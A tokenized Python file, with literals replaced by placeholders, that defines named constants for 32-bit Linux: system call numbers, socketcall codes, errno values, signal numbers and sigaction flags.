__NR_getuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgid32 = Constant ( '<STR_LIT>' , <NUM_LIT:200> ) <EOL> __NR_geteuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getegid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setreuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> 
) <EOL> __NR_setregid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgroups32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_chown32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setfsgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pivot_root = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mincore = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_madvise = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_madvise1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getdents64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fcntl64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_gettid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readahead = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_setxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fsetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fgetxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_listxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_llistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_flistxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_removexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fremovexattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> 
__NR_tkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sendfile64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_futex = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_setaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sched_getaffinity = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_setup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_destroy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_getevents = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_submit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_io_cancel = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fadvise64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_exit_group = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_lookup_dcookie = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_ctl = Constant ( '<STR_LIT>' , <NUM_LIT:255> ) <EOL> __NR_epoll_wait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_remap_file_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_tid_address = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timer_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timer_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> __NR_timer_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> __NR_timer_getoverrun = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> __NR_timer_delete = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> __NR_clock_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> __NR_clock_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:6> ) ) <EOL> __NR_clock_getres = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:7> ) ) <EOL> __NR_clock_nanosleep = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:8> ) ) <EOL> __NR_statfs64 = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstatfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_tgkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_utimes = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fadvise64_64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vserver = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mbind = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_mempolicy = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mq_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mq_unlink = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> __NR_mq_timedsend = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> __NR_mq_timedreceive = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> __NR_mq_notify = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> __NR_mq_getsetattr = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:5> ) ) <EOL> __NR_sys_kexec_load = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_waitid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_add_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_request_key = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_keyctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ioprio_set = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ioprio_get = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_add_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_rm_watch = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_migrate_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_openat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mkdirat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_mknodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchownat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_futimesat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fstatat64 = Constant ( '<STR_LIT>' , <NUM_LIT> 
) <EOL> __NR_unlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_renameat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_linkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_symlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_readlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fchmodat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_faccessat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pselect6 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_ppoll = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_unshare = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_set_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_get_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_splice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_sync_file_range = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_tee = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_vmsplice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_move_pages = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_getcpu = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_pwait = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_utimensat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_signalfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timerfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_eventfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fallocate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timerfd_settime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_timerfd_gettime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_signalfd4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_eventfd2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_epoll_create1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_dup3 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pipe2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_inotify_init1 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_preadv = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_pwritev 
= Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_rt_tgsigqueueinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_perf_event_open = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_recvmmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fanotify_init = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_fanotify_mark = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __NR_prlimit64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_SOCKET = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SYS_BIND = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SYS_CONNECT = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SYS_LISTEN = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SYS_ACCEPT = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SYS_GETSOCKNAME = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SYS_GETPEERNAME = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SYS_SOCKETPAIR = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SYS_SEND = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SYS_RECV = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SYS_SENDTO = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SYS_RECVFROM = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SYS_SHUTDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_SETSOCKOPT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_GETSOCKOPT = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SYS_SENDMSG = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SYS_RECVMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> MAP_32BIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> INADDR_ANY = Constant ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> INADDR_BROADCAST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> INADDR_NONE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> INADDR_LOOPBACK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPERM = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ENOENT = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> ESRCH = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> EINTR = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> EIO = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> ENXIO = 
Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> E2BIG = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> ENOEXEC = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> EBADF = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> ECHILD = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> EAGAIN = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> ENOMEM = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> EACCES = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EFAULT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTBLK = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> EBUSY = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> EEXIST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EXDEV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENODEV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTDIR = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> EISDIR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EINVAL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENFILE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMFILE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTTY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETXTBSY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EFBIG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSPC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EROFS = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> EMLINK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPIPE = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> EDOM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ERANGE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDEADLK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENAMETOOLONG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOLCK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSYS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTEMPTY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELOOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EWOULDBLOCK = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> ENOMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EIDRM = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> ECHRNG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EL2NSYNC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EL3HLT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EL3RST = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELNRNG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EUNATCH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOCSI = Constant ( '<STR_LIT>' , <NUM_LIT:50> ) <EOL> EL2HLT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EXFULL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOANO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADRQC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADSLT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDEADLOCK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBFONT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSTR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENODATA = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETIME = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOSR = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENONET = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> ENOPKG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EREMOTE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOLINK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EADV = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESRMNT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECOMM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPROTO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMULTIHOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDOTDOT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADMSG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EOVERFLOW = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTUNIQ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EBADFD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EREMCHG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBACC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBBAD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBSCN = Constant ( '<STR_LIT>' , 
<NUM_LIT> ) <EOL> ELIBMAX = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ELIBEXEC = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EILSEQ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ERESTART = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESTRPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EUSERS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTSOCK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDESTADDRREQ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMSGSIZE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPROTOTYPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOPROTOOPT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPROTONOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESOCKTNOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EOPNOTSUPP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTSUP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EPFNOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EAFNOSUPPORT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EADDRINUSE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EADDRNOTAVAIL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENETDOWN = Constant ( '<STR_LIT>' , <NUM_LIT:100> ) <EOL> ENETUNREACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENETRESET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECONNABORTED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECONNRESET = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOBUFS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EISCONN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTCONN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESHUTDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETOOMANYREFS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ETIMEDOUT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECONNREFUSED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EHOSTDOWN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EHOSTUNREACH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EALREADY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EINPROGRESS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ESTALE = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> EUCLEAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOTNAM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENAVAIL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EISNAM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EREMOTEIO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EDQUOT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOMEDIUM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EMEDIUMTYPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ECANCELED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> ENOKEY = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EKEYEXPIRED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EKEYREVOKED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> EKEYREJECTED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __SYS_NERR = Constant ( '<STR_LIT>' , ( ( <NUM_LIT> ) + <NUM_LIT:1> ) ) <EOL> __LITTLE_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __BIG_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __BYTE_ORDER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __FLOAT_WORD_ORDER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> LITTLE_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> BIG_ENDIAN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> BYTE_ORDER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> __WORDSIZE = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> __FSUID_H = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> NSIG = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> _NSIG = Constant ( '<STR_LIT>' , <NUM_LIT:64> ) <EOL> SIGHUP = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SIGINT = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SIGQUIT = Constant ( '<STR_LIT>' , <NUM_LIT:3> ) <EOL> SIGILL = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SIGTRAP = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SIGABRT = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SIGIOT = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SIGFPE = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SIGKILL = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SIGSEGV = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> 
SIGPIPE = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGALRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGTERM = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SIGUNUSED = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGBUS = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SIGUSR1 = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SIGUSR2 = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SIGSTKFLT = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SIGCHLD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGCONT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGSTOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGTSTP = Constant ( '<STR_LIT>' , <NUM_LIT:20> ) <EOL> SIGTTIN = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGTTOU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGURG = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGXCPU = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGXFSZ = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGVTALRM = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGPROF = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGWINCH = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGIO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGPWR = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SIGSYS = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGCLD = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGPOLL = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SIGLOST = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SIGRTMIN = Constant ( '<STR_LIT>' , <NUM_LIT:32> ) <EOL> SIGRTMAX = Constant ( '<STR_LIT>' , ( <NUM_LIT:64> - <NUM_LIT:1> ) ) <EOL> SA_NOCLDSTOP = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_NOCLDWAIT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_SIGINFO = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_RESTORER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_ONSTACK = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_RESTART = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_INTERRUPT = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SA_NODEFER = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> 
